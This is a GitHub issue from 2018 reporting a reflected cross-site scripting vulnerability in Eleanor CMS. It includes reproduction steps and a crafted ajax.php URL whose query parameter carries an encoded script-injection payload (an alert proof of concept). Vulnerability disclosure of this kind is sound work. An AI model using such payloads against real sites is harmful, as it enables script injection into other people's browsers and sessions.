New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Bug:Cross Site Scripting Vulnerability #5

Open
dreamsroid opened this Issue Oct 24, 2018 · 0 comments

Comments

Projects
None yet
1 participant
@dreamsroid

dreamsroid commented Oct 24, 2018

Hi, I would like to report Cross Site Scripting vulnerability in latest release.

Description:
Cross-site scripting (XSS) vulnerability in might allow query pic then you can inject arbitrary web script or HTML via the multiple parameters.

Steps To Reproduce:

  1. login to administrator panel.

2.Open below URL in browser which supports flash.
http://xx.xx.xx.xx/Eleanor-CMS/ajax.php?direct=admin&file=autocomplete&filter=types&types=png%2Cjpeg%2Cjpg%2Cbmp%2Cgif&query=http%3a%2f%2fi-1-chuzhaobiao.715083.com%2f2018%2f10%2f24%2fb5571ac0-765f-4396-a66a-bfd33cc104e5.png%3fimageView2%2f2%2fq%2f65%2fw%2f600%7cwatermark%2f3%2fimage%2faHR0cDovL2ktMS1jaHV6aGFvYmlhby43MTUwODMuY29tLzMucG5n%2fdissolve%2f100%2fgravity%2fSouthEast%2fdx%2f13%2fdy%2f13%7cimageslimpuf8t%3cscript%3ealert(1)%3c%2fscript%3e
Fix:
check the uploaded url.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment